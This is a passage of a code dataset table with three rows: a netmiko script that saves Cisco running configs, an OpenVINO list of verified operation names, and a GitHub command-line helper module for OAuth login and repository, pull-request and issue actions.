| max_stars_repo_path (stringlengths 4-286) | max_stars_repo_name (stringlengths 5-119) | max_stars_count (int64 0-191k) | id (stringlengths 1-7) | content (stringlengths 6-1.03M) | content_cleaned (stringlengths 6-1.03M) | language (stringclasses, 111 values) | language_score (float64 0.03-1) | comments (stringlengths 0-556k) | edu_score (float64 0.32-5.03) | edu_int_score (int64 0-5) |
|---|---|---|---|---|---|---|---|---|---|---|
netmiko/example7.py | Tes3awy/Ntemiko-Examples | 3 | 8000 | # Must run example4.py first
# Read an Excel sheet and save running config of devices using pandas
import pandas as pd
from netmiko import ConnectHandler
# Read Excel file of .xlsx format
data = pd.read_excel(io="Example4-Device-Details.xlsx", sheet_name=0)
# Convert data to data frame
df = pd.DataFrame(data=data)
# Convert the MGMT IP Address column of the data frame to a list
device_ip_list = df.iloc[:, 1].tolist()
# Define devices variable
devices = []
for ip in device_ip_list:
devices.append(
{
"device_type": "cisco_ios", # must be the same for all devices
"ip": ip,
"username": "developer", # must be the same for all devices
"password": "<PASSWORD>", # must be the same for all devices
"port": 22, # must be the same for all devices
# If port for all devices is not 22 you will get an error
"fast_cli": False,
}
)
for device in devices:
# Create a connection instance
with ConnectHandler(**device) as net_connect:
# hostname of the current device
hostname = net_connect.send_command(
command_string="show version", use_textfsm=True
)[0]["hostname"]
run_cfg: str = net_connect.send_command(command_string="show running-config")
# Create .txt for each running configuration of each device
with open(file=f"{hostname}_ex7-run-cfg.txt", mode="w") as outfile:
outfile.write(run_cfg.lstrip())
print("Done")
| en | 0.777782 | # Must run example4.py first # Read an Excel sheet and save running config of devices using pandas # Read Excel file of .xlsx format # Convert data to data frame # Conevrt data frame from MGMT IP Address to a list # Define devices variable # must be the same for all devices # must be the same for all devices # must be the same for all devices # must be the same for all devices # If port for all devices is not 22 you will get an error # Create a connection instance # hostname of the current device # Create .txt for each running configuration of each device | 2.649545 | 3 |
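The example7.py row above reads the management addresses positionally with `df.iloc[:, 1]` and relies on TextFSM parsing of `show version` to learn each hostname. A minimal alternative sketch follows; the column header "MGMT IP Address" and the spreadsheet name are assumptions taken from the script's own comments, and the hostname is derived from the device prompt so the sketch works even without ntc-templates installed.

```python
# Sketch only: the spreadsheet name and the "MGMT IP Address" column header
# are assumed from the comments in example7.py above.
import pandas as pd
from netmiko import ConnectHandler

df = pd.read_excel("Example4-Device-Details.xlsx", sheet_name=0)
device_ip_list = df["MGMT IP Address"].tolist()  # select the column by name, not position

for ip in device_ip_list:
    device = {
        "device_type": "cisco_ios",
        "ip": ip,
        "username": "developer",
        "password": "********",  # placeholder credential
        "port": 22,
        "fast_cli": False,
    }
    with ConnectHandler(**device) as conn:
        # Derive the hostname from the CLI prompt instead of TextFSM output.
        hostname = conn.find_prompt().rstrip("#>")
        run_cfg = conn.send_command("show running-config")
    # One text file per device, mirroring the original script's naming scheme.
    with open(f"{hostname}_run-cfg.txt", "w") as outfile:
        outfile.write(run_cfg.lstrip())
```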
inference-engine/tests/ie_test_utils/functional_test_utils/layer_tests_summary/utils/constants.py | plaidml/openvino | 0 | 8001 | # Copyright (C) 2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
VERIFIED_OP_REFERENCES = [
'Abs-1',
'Acos-1',
'Add-1',
'Asin-1',
'Asinh-3',
'Assign-6',
'AvgPool-1',
'BatchNormInference-5',
'BatchToSpace-2',
'BinaryConvolution-1',
'Broadcast-1',
'Broadcast-3',
'Bucketize-3',
'Ceiling-1',
'CTCGreedyDecoder-1',
'CTCGreedyDecoderSeqLen-6',
'Concat-1',
'Convert-1',
'ConvertLike-1',
'Convolution-1',
'Constant-1',
'Cos-1',
'Cosh-1',
'DeformableConvolution-1',
'DeformablePSROIPooling-1',
'DepthToSpace-1',
'DetectionOutput-1',
'Divide-1',
'ExperimentalDetectronDetectionOutput-6',
'ExperimentalDetectronGenerateProposalsSingleImage-6',
'ExperimentalDetectronPriorGridGenerator-6',
'ExperimentalDetectronROIFeatureExtractor-6',
'ExperimentalDetectronTopKROIs-6',
'FakeQuantize-1',
'Floor-1',
'FloorMod-1',
'Gather-1',
'GatherElements-6',
'GatherND-5',
'Gelu-7',
'GRN-1',
'GroupConvolution-1',
'GroupConvolutionBackpropData-1',
'GRUSequence-5',
'HSigmoid-5',
'HSwish-4',
'HardSigmoid-1',
'Interpolate-4',
'LRN-1',
'LSTMCell-4',
'LSTMSequence-5',
'LogSoftmax-5',
'Loop-5',
'MVN-6',
'Maximum-1',
'MaxPool-1',
'Mish-4',
'Multiply-1',
'Negative-1',
'NonMaxSuppression-4',
'NonMaxSuppression-5',
'NonZero-3',
'NormalizeL2-1',
'PriorBox-1',
'PriorBoxClustered-1',
'Proposal-1',
'Proposal-4',
'PSROIPooling-1',
'RNNSequence-5',
'ROIAlign-3',
'ROIPooling-2',
'Range-1',
'Range-4',
'ReadValue-6',
'ReduceL1-4',
'ReduceL2-4',
'ReduceLogicalAnd-1',
'ReduceLogicalOr-1',
'ReduceMax-1',
'ReduceMean-1',
'ReduceMin-1',
'ReduceProd-1',
'ReduceSum-1',
'RegionYOLO-1',
'Relu-1',
'ReorgYOLO-2',
'Result-1',
'Round-5',
'SpaceToDepth-1',
'ScatterNDUpdate-4',
'Select-1',
'ShapeOf-1',
'ShapeOf-3',
'ShuffleChannels-1',
'Sigmoid-1',
'Sign-1',
'Sin-1',
'Sinh-1',
'SoftPlus-4',
'Softmax-1',
'Split-1',
'Squeeze-1',
'StridedSlice-1',
'Subtract-1',
'Swish-4',
'Tile-1',
'TopK-1',
'TopK-3',
'Transpose-1',
'Unsqueeze-1',
'VariadicSplit-1',
]
| en | 0.269678 | # Copyright (C) 2021 Intel Corporation # SPDX-License-Identifier: Apache-2.0 | 1.222661 | 1 |
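A detail worth noting about the VERIFIED_OP_REFERENCES list above: in Python, two adjacent string literals with no comma between them are silently concatenated, so a missed comma turns two entries such as 'Floor-1' and 'FloorMod-1' into the single bogus entry 'Floor-1FloorMod-1'. The snippet below is a small, hypothetical sanity check (not part of the OpenVINO sources) that flags entries which do not match the Name-opset pattern the list uses.

```python
import re

# Every verified reference is expected to look like "OpName-<opset number>".
OP_REFERENCE_PATTERN = re.compile(r"^[A-Za-z0-9]+-\d+$")

def find_malformed_refs(refs):
    """Return entries that are not a single well-formed 'OpName-<opset>' string."""
    return [ref for ref in refs if not OP_REFERENCE_PATTERN.match(ref)]

if __name__ == "__main__":
    sample = ["Abs-1", "Floor-1" "FloorMod-1"]  # note the missing comma
    print(find_malformed_refs(sample))  # prints ['Floor-1FloorMod-1']
```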
ghub/githubutils.py | mahanthathreyee/ghub | 0 | 8002 | """Utilities for interacting with GitHub"""
import os
import json
import webbrowser
import stat
import sys
from git import Repo
from .context import Context
event_dict = {
"added_to_project": (
lambda event: "{} added the issue to a project.".format(event["actor"]["login"])
),
"assigned": (
lambda event: "{} assigned the issue to {}.".format(
event["actor"]["login"], event["assignee"]["login"]
)
),
"closed": (lambda event: "{} closed this issue.".format(event["actor"]["login"])),
"converted_note_to_issue": (
lambda event: "{} created this issue from a note.".format(
event["actor"]["login"]
)
),
"demilestoned": (lambda event: "The issue was removed from a milestone."),
"head_ref_deleted": (lambda event: "The pull request's branch was deleted."),
"head_ref_restored": (lambda event: "The pull request's branch was restored."),
"labelled": (
lambda event: "{} added {} label to the issue.".format(
event["actor"]["login"], event["label"]
)
),
"locked": (
lambda event: "The issue was locked by {}.".format(event["actor"]["login"])
),
"mentioned": (
lambda event: "{} was mentioned in the issue's body.".format(
event["actor"]["login"]
)
),
"marked_as_duplicate": (
lambda event: "The issue was marked duplicate by {}.".format(
event["actor"]["login"]
)
),
"merged": (
lambda event: "The issue was merged by {}.".format(event["actor"]["login"])
),
"milestoned": (lambda event: "The issue was added to a milestone."),
"moved_columns_in_project": (
lambda event: "The issue was moved between columns in a project board."
),
"referenced": (lambda event: "The issue was referenced from a commit message."),
"renamed": (lambda event: "The title of the issue was changed."),
"reopened": (
lambda event: "The issue was reopened by {}".format(event["actor"]["login"])
),
"review_dismissed": (
lambda event: "{} dismissed a review from the pull request.".format(
event["actor"]["login"]
)
),
"review_requested": (
lambda event: "{} requested review from the subject on this pull request.".format(
event["actor"]["login"]
)
),
"review_request_removed": (
lambda event: "{} removed the review request for the subject on this pull request.".format(
event["actor"]["login"]
)
),
"subscribed": (
lambda event: "{} subscribed to receive notifications for the issue.".format(
event["actor"]["login"]
)
),
"transferred": (lambda event: "The issue was transferred to another repository."),
"unassigned": (
lambda event: "{} was unassigned from the issue.".format(
event["actor"]["login"]
)
),
"unlabeled": (lambda event: "A label was removed from the issue."),
"unlocked": (
lambda event: "The issue was unlocked by {}".format(event["actor"]["login"])
),
"unmarked_as_duplicate": (lambda event: "The was unmarked as dublicate."),
"user_blocked": (lambda event: "A user was blocked from the organization."),
}
def authorize(ghub, reauthorize=False, fromenv=False):
"""Authorize a user for GHub
Keyword arguments:
ghub -- the ghub object that needs authorization
reauthorize -- performs authorization again (default False)
"""
if fromenv:
oauth_data = json.loads(os.environ["GHUB_CRED"])
ghub.oauth_data = oauth_data
ghub.github.token = oauth_data
return True
if not os.path.isfile(ghub.data_path / ghub.auth_filename) or reauthorize:
authorization_base_url = "https://github.com/login/oauth/authorize"
token_url = "https://github.com/login/oauth/access_token"
authorization_url, _ = ghub.github.authorization_url(authorization_base_url)
webbrowser.open(authorization_url)
print("Please visit this site and grant access: {}".format(authorization_url))
redirect_response = input(
"Please enter the URL you were redirected to after granting access: "
)
try:
response = ghub.github.fetch_token(
token_url,
client_secret=ghub.client_secret,
authorization_response=redirect_response,
)
except Exception as e:
print(e)
print(
"Network Error. Make sure you have a working internet connection and try again."
)
sys.exit(1)
if not os.path.isdir(ghub.data_path):
os.makedirs(ghub.data_path)
data_file = open(ghub.data_path / ghub.auth_filename, "w+")
json.dump(response, data_file)
data_file.close()
os.chmod(ghub.data_path / ghub.auth_filename, stat.S_IRUSR | stat.S_IWUSR)
ghub.oauth_data = response
return True
else:
data_file = open(ghub.data_path / ghub.auth_filename, "r")
oauth_data = json.loads(data_file.read())
data_file.close()
ghub.oauth_data = oauth_data
ghub.github.token = oauth_data
return True
def get_user(ghub, user):
url = ghub.api_url + ghub.endpoints["users"] + user
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "user"
ghub.context.location = user
ghub.context.cache = response.json()
return True
return False
def get_org(ghub, org):
url = ghub.api_url + ghub.endpoints["orgs"] + org
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "org"
ghub.context.location = org
ghub.context.cache = response.json()
return True
return False
def get_user_tabs(ghub, tab=""):
tabs = ["repos", "stars", "followers", "following", "notifications"]
if tab not in tabs:
print("{} is not a valid user tab".format(tab))
return
if ghub.context.context == "root":
if tab == "":
ghub.context.set_context_to_root()
elif tab == "repos":
response = ghub.github.get(ghub.api_url + ghub.endpoints["user"] + "/repos")
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + "repos"
ghub.context.context = "repos"
else:
print("Error getting data - " + response.status_code)
elif tab == "stars":
response = ghub.github.get(
ghub.api_url + ghub.endpoints["user"] + "/starred"
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + "stars"
ghub.context.context = "stars"
else:
print("Error getting data - " + response.status_code)
elif tab == "followers" or tab == "following":
response = ghub.github.get(
ghub.api_url + ghub.endpoints["user"] + "/" + tab
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
elif tab == "notifications":
response = ghub.github.get(ghub.api_url + ghub.endpoints["notifications"])
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
elif ghub.context.context == "user" or ghub.context.context == "org":
if tab == "":
ghub.context.set_context_to_root()
elif tab == "repos":
if ghub.context.context == "user":
url = (
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/repos"
)
else:
url = (
ghub.api_url
+ ghub.endpoints["orgs"]
+ ghub.context.location
+ "/repos"
)
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = (
ghub.context.prev_context.location + "/" + "repos"
)
ghub.context.context = "repos"
else:
print("Error getting data - " + response.status_code)
elif tab == "stars":
response = ghub.github.get(
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/starred"
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = (
ghub.context.prev_context.location + "/" + "star"
)
ghub.context.context = "stars"
else:
print("Error getting data - " + response.status_code)
elif tab == "followers" or tab == "following":
response = ghub.github.get(
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/"
+ tab
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.context.prev_context.location + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
else:
pass
def get_latest_commit(ghub, repo, branch="master"):
api_url = "https://api.github.com/repos/{}/branches/{}".format(repo, branch)
response = ghub.github.get(api_url)
if response.status_code == 200:
response = response.json()
return response["commit"]["commit"]
else:
return False
def get_tree(ghub, repo=None, branch="master", tree_url=None):
if tree_url == None:
latest_commit = get_latest_commit(ghub, repo, branch)
if latest_commit == False:
return False
response = ghub.github.get(latest_commit["tree"]["url"])
if response.status_code == 200:
response = response.json()
return response
return False
else:
response = ghub.github.get(tree_url)
if response.status_code == 200:
response = response.json()
return response
def get_blob(ghub, blob_url):
response = ghub.github.get(blob_url)
if response.status_code == 200:
return response.json()
return False
def clone_repo(ghub, dir, repo_name=None):
print("Preparing to clone...")
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
if dir[0] == "~":
dir = os.path.expanduser("~") + dir[1:]
dir = dir + "/" + repo_name.split("/")[1]
try:
Repo.clone_from("https://github.com/" + repo_name, dir)
print("{} cloned to {}".format(repo_name, dir))
return True
except Exception as e:
print(e)
return False
def star_repo(ghub, repo_name=None):
print("Starring repo...")
if repo_name == None:
repo_name = ghub.context.location
star_url = ghub.api_url + ghub.endpoints["user"] + "/" + "starred/" + repo_name
response = ghub.github.get(star_url)
if response.status_code == 204:
print("Repo is already starred.")
elif response.status_code == 404:
resp = ghub.github.put(star_url)
if resp.status_code == 204:
print("{} starred".format(repo_name))
else:
print("Error starring repo")
def unstar_repo(ghub, repo_name=None):
print("Unstarring repo...")
if repo_name == None:
repo_name = ghub.context.location
star_url = ghub.api_url + ghub.endpoints["user"] + "/" + "starred/" + repo_name
response = ghub.github.get(star_url)
if response.status_code == 204:
resp = ghub.github.delete(star_url)
if resp.status_code == 204:
print("{} unstarred".format(repo_name))
else:
print("Error unstarring repo")
elif response.status_code == 404:
print("Repo is not starred.")
def watch_repo(ghub, repo_name=None):
print("Subscribing to repo...")
if repo_name == None:
repo_name = ghub.context.location
watch_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/subscription"
response = ghub.github.get(watch_url)
if response.status_code == 200:
print("You are already watching this repo.")
elif response.status_code == 404:
resp = ghub.github.put(watch_url)
if resp.status_code == 200:
print("Watching {}".format(repo_name))
else:
print("Error subscribing to repo")
def unwatch_repo(ghub, repo_name=None):
print("Unsubscribing repo...")
if repo_name == None:
repo_name = ghub.context.location
watch_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/subscription"
response = ghub.github.get(watch_url)
if response.status_code == 200:
resp = ghub.github.delete(watch_url)
if resp.status_code == 204:
print("{} unsubscribed".format(repo_name))
else:
print("Error unsubscribing to repo")
elif response.status_code == 404:
print("You are not watching this repo.")
def fork_repo(ghub, repo_name=None):
print("Forking Repo...")
if repo_name == None:
repo_name = ghub.context.location.split("/")
repo_name = "/".join(repo_name[:2])
true_repo_name = repo_name.split("/")[1]
forked_url = (
ghub.api_url
+ ghub.endpoints["repos"]
+ ghub.get_user_username()
+ "/"
+ true_repo_name
)
response = ghub.github.get(forked_url)
if response.status_code == 200:
print("Cannot fork. Repo Already Exists.")
return False
print("Repo is being forked. Please wait for it to complete.", end="")
response = ghub.github.post(
ghub.api_url + ghub.endpoints["repos"] + repo_name + "/forks"
)
if response.status_code == 202:
print(
"\nForking complete. Forked repo to {}".format(
ghub.get_user_username() + "/" + true_repo_name
)
)
return True
else:
print("Error while trying fork.")
return False
def get_prs(ghub, repo_name=None):
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
pr_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/pulls"
response = ghub.github.get(pr_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "pull_requests"
ghub.context.location = repo_name + "/pull_requests"
ghub.context.cache = response.json()
return True
return False
def get_pr(ghub, pr_no):
if not pr_no.isdigit():
print("Invalid PR number")
return False
repo_name = "/".join(ghub.context.location.split("/")[:2])
pr_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/pulls/" + pr_no
response = ghub.github.get(pr_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "pull_request"
ghub.context.location = repo_name + "/pull_requests/" + pr_no
ghub.context.cache = response.json()
return True
elif response.status_code == 404:
print("No PR found with PR number {}".format(pr_no))
return False
def get_pr_info(ghub, info_type="comments"):
info_url = ghub.context.cache["_links"][info_type]["href"]
response = ghub.github.get(info_url)
return response.json(), response.status_code
def get_issues(ghub, repo_name=None):
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
issue_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/issues"
response = ghub.github.get(issue_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "issues"
ghub.context.location = repo_name + "/issues"
ghub.context.cache = response.json()
return True
return False
def get_issue(ghub, issue_no):
if not issue_no.isdigit():
print("Invalid issue number")
return False
repo_name = "/".join(ghub.context.location.split("/")[:2])
issue_url = (
ghub.api_url + ghub.endpoints["repos"] + repo_name + "/issues/" + issue_no
)
response = ghub.github.get(issue_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "issue"
ghub.context.location = repo_name + "/issues/" + issue_no
ghub.context.cache = response.json()
return True
elif response.status_code == 404:
print("No issue found with issue number {}".format(issue_no))
return False
def get_issue_info(ghub, info_type="comments"):
info_url = ghub.context.cache["{}_url".format(info_type)]
response = ghub.github.get(info_url)
return response.json(), response.status_code
| """Utilities for interacting with GitHub"""
import os
import json
import webbrowser
import stat
import sys
from git import Repo
from .context import Context
event_dict = {
"added_to_project": (
lambda event: "{} added the issue to a project.".format(event["actor"]["login"])
),
"assigned": (
lambda event: "{} assigned the issue to {}.".format(
event["actor"]["login"], event["assignee"]["login"]
)
),
"closed": (lambda event: "{} closed this issue.".format(event["actor"]["login"])),
"converted_note_to_issue": (
lambda event: "{} created this issue from a note.".format(
event["actor"]["login"]
)
),
"demilestoned": (lambda event: "The issue was removed from a milestone."),
"head_ref_deleted": (lambda event: "The pull request's branch was deleted."),
"head_ref_restored": (lambda event: "The pull request's branch was restored."),
"labelled": (
lambda event: "{} added {} label to the issue.".format(
event["actor"]["login"], event["label"]
)
),
"locked": (
lambda event: "The issue was locked by {}.".format(event["actor"]["login"])
),
"mentioned": (
lambda event: "{} was mentioned in the issue's body.".format(
event["actor"]["login"]
)
),
"marked_as_duplicate": (
lambda event: "The issue was marked duplicate by {}.".format(
event["actor"]["login"]
)
),
"merged": (
lambda event: "The issue was merged by {}.".format(event["actor"]["login"])
),
"milestoned": (lambda event: "The issue was added to a milestone."),
"moved_columns_in_project": (
lambda event: "The issue was moved between columns in a project board."
),
"referenced": (lambda event: "The issue was referenced from a commit message."),
"renamed": (lambda event: "The title of the issue was changed."),
"reopened": (
lambda event: "The issue was reopened by {}".format(event["actor"]["login"])
),
"review_dismissed": (
lambda event: "{} dismissed a review from the pull request.".format(
event["actor"]["login"]
)
),
"review_requested": (
lambda event: "{} requested review from the subject on this pull request.".format(
event["actor"]["login"]
)
),
"review_request_removed": (
lambda event: "{} removed the review request for the subject on this pull request.".format(
event["actor"]["login"]
)
),
"subscribed": (
lambda event: "{} subscribed to receive notifications for the issue.".format(
event["actor"]["login"]
)
),
"transferred": (lambda event: "The issue was transferred to another repository."),
"unassigned": (
lambda event: "{} was unassigned from the issue.".format(
event["actor"]["login"]
)
),
"unlabeled": (lambda event: "A label was removed from the issue."),
"unlocked": (
lambda event: "The issue was unlocked by {}".format(event["actor"]["login"])
),
"unmarked_as_duplicate": (lambda event: "The was unmarked as dublicate."),
"user_blocked": (lambda event: "A user was blocked from the organization."),
}
def authorize(ghub, reauthorize=False, fromenv=False):
"""Authorize a user for GHub
Keyword arguments:
ghub -- the ghub object that needs authorization
reauthorize -- performs authorization again (default False)
"""
if fromenv:
oauth_data = json.loads(os.environ["GHUB_CRED"])
ghub.oauth_data = oauth_data
ghub.github.token = oauth_data
return True
if not os.path.isfile(ghub.data_path / ghub.auth_filename) or reauthorize:
authorization_base_url = "https://github.com/login/oauth/authorize"
token_url = "https://github.com/login/oauth/access_token"
authorization_url, _ = ghub.github.authorization_url(authorization_base_url)
webbrowser.open(authorization_url)
print("Please visit this site and grant access: {}".format(authorization_url))
redirect_response = input(
"Please enter the URL you were redirected to after granting access: "
)
try:
response = ghub.github.fetch_token(
token_url,
client_secret=ghub.client_secret,
authorization_response=redirect_response,
)
except Exception as e:
print(e)
print(
"Network Error. Make sure you have a working internet connection and try again."
)
sys.exit(1)
if not os.path.isdir(ghub.data_path):
os.makedirs(ghub.data_path)
data_file = open(ghub.data_path / ghub.auth_filename, "w+")
json.dump(response, data_file)
data_file.close()
os.chmod(ghub.data_path / ghub.auth_filename, stat.S_IRUSR | stat.S_IWUSR)
ghub.oauth_data = response
return True
else:
data_file = open(ghub.data_path / ghub.auth_filename, "r")
oauth_data = json.loads(data_file.read())
data_file.close()
ghub.oauth_data = oauth_data
ghub.github.token = oauth_data
return True
def get_user(ghub, user):
url = ghub.api_url + ghub.endpoints["users"] + user
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "user"
ghub.context.location = user
ghub.context.cache = response.json()
return True
return False
def get_org(ghub, org):
url = ghub.api_url + ghub.endpoints["orgs"] + org
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "org"
ghub.context.location = org
ghub.context.cache = response.json()
return True
return False
def get_user_tabs(ghub, tab=""):
tabs = ["repos", "stars", "followers", "following", "notifications"]
if tab not in tabs:
print("{} is not a valid user tab".format(tab))
return
if ghub.context.context == "root":
if tab == "":
ghub.context.set_context_to_root()
elif tab == "repos":
response = ghub.github.get(ghub.api_url + ghub.endpoints["user"] + "/repos")
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + "repos"
ghub.context.context = "repos"
else:
print("Error getting data - " + response.status_code)
elif tab == "stars":
response = ghub.github.get(
ghub.api_url + ghub.endpoints["user"] + "/starred"
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + "stars"
ghub.context.context = "stars"
else:
print("Error getting data - " + response.status_code)
elif tab == "followers" or tab == "following":
response = ghub.github.get(
ghub.api_url + ghub.endpoints["user"] + "/" + tab
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
elif tab == "notifications":
response = ghub.github.get(ghub.api_url + ghub.endpoints["notifications"])
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
elif ghub.context.context == "user" or ghub.context.context == "org":
if tab == "":
ghub.context.set_context_to_root()
elif tab == "repos":
if ghub.context.context == "user":
url = (
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/repos"
)
else:
url = (
ghub.api_url
+ ghub.endpoints["orgs"]
+ ghub.context.location
+ "/repos"
)
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = (
ghub.context.prev_context.location + "/" + "repos"
)
ghub.context.context = "repos"
else:
print("Error getting data - " + response.status_code)
elif tab == "stars":
response = ghub.github.get(
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/starred"
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = (
ghub.context.prev_context.location + "/" + "star"
)
ghub.context.context = "stars"
else:
print("Error getting data - " + response.status_code)
elif tab == "followers" or tab == "following":
response = ghub.github.get(
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/"
+ tab
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.context.prev_context.location + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
else:
pass
def get_latest_commit(ghub, repo, branch="master"):
api_url = "https://api.github.com/repos/{}/branches/{}".format(repo, branch)
response = ghub.github.get(api_url)
if response.status_code == 200:
response = response.json()
return response["commit"]["commit"]
else:
return False
def get_tree(ghub, repo=None, branch="master", tree_url=None):
if tree_url == None:
latest_commit = get_latest_commit(ghub, repo, branch)
if latest_commit == False:
return False
response = ghub.github.get(latest_commit["tree"]["url"])
if response.status_code == 200:
response = response.json()
return response
return False
else:
response = ghub.github.get(tree_url)
if response.status_code == 200:
response = response.json()
return response
def get_blob(ghub, blob_url):
response = ghub.github.get(blob_url)
if response.status_code == 200:
return response.json()
return False
def clone_repo(ghub, dir, repo_name=None):
print("Preparing to clone...")
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
if dir[0] == "~":
dir = os.path.expanduser("~") + dir[1:]
dir = dir + "/" + repo_name.split("/")[1]
try:
Repo.clone_from("https://github.com/" + repo_name, dir)
print("{} cloned to {}".format(repo_name, dir))
return True
except Exception as e:
print(e)
return False
def star_repo(ghub, repo_name=None):
print("Starring repo...")
if repo_name == None:
repo_name = ghub.context.location
star_url = ghub.api_url + ghub.endpoints["user"] + "/" + "starred/" + repo_name
response = ghub.github.get(star_url)
if response.status_code == 204:
print("Repo is already starred.")
elif response.status_code == 404:
resp = ghub.github.put(star_url)
if resp.status_code == 204:
print("{} starred".format(repo_name))
else:
print("Error starring repo")
def unstar_repo(ghub, repo_name=None):
print("Unstarring repo...")
if repo_name == None:
repo_name = ghub.context.location
star_url = ghub.api_url + ghub.endpoints["user"] + "/" + "starred/" + repo_name
response = ghub.github.get(star_url)
if response.status_code == 204:
resp = ghub.github.delete(star_url)
if resp.status_code == 204:
print("{} unstarred".format(repo_name))
else:
print("Error unstarring repo")
elif response.status_code == 404:
print("Repo is not starred.")
def watch_repo(ghub, repo_name=None):
print("Subscribing to repo...")
if repo_name == None:
repo_name = ghub.context.location
watch_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/subscription"
response = ghub.github.get(watch_url)
if response.status_code == 200:
print("You are already watching this repo.")
elif response.status_code == 404:
resp = ghub.github.put(watch_url)
if resp.status_code == 200:
print("Watching {}".format(repo_name))
else:
print("Error subscribing to repo")
def unwatch_repo(ghub, repo_name=None):
print("Unsubscribing repo...")
if repo_name == None:
repo_name = ghub.context.location
watch_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/subscription"
response = ghub.github.get(watch_url)
if response.status_code == 200:
resp = ghub.github.delete(watch_url)
if resp.status_code == 204:
print("{} unsubscribed".format(repo_name))
else:
print("Error unsubscribing to repo")
elif response.status_code == 404:
print("You are not watching this repo.")
def fork_repo(ghub, repo_name=None):
print("Forking Repo...")
if repo_name == None:
repo_name = ghub.context.location.split("/")
repo_name = "/".join(repo_name[:2])
true_repo_name = repo_name.split("/")[1]
forked_url = (
ghub.api_url
+ ghub.endpoints["repos"]
+ ghub.get_user_username()
+ "/"
+ true_repo_name
)
response = ghub.github.get(forked_url)
if response.status_code == 200:
print("Cannot fork. Repo Already Exists.")
return False
print("Repo is being forked. Please wait for it to complete.", end="")
response = ghub.github.post(
ghub.api_url + ghub.endpoints["repos"] + repo_name + "/forks"
)
if response.status_code == 202:
print(
"\nForking complete. Forked repo to {}".format(
ghub.get_user_username() + "/" + true_repo_name
)
)
return True
else:
print("Error while trying fork.")
return False
def get_prs(ghub, repo_name=None):
if repo_name == None:
repo_name = "/".join(ghub.context.location.split("/")[:2])
pr_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/pulls"
response = ghub.github.get(pr_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "pull_requests"
ghub.context.location = repo_name + "/pull_requests"
ghub.context.cache = response.json()
return True
return False
def get_pr(ghub, pr_no):
if not pr_no.isdigit():
print("Invalid PR number")
return False
repo_name = "/".join(ghub.context.location.split("/")[:2])
pr_url = ghub.api_url + ghub.endpoints["repos"] + repo_name + "/pulls/" + pr_no
response = ghub.github.get(pr_url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "pull_request"
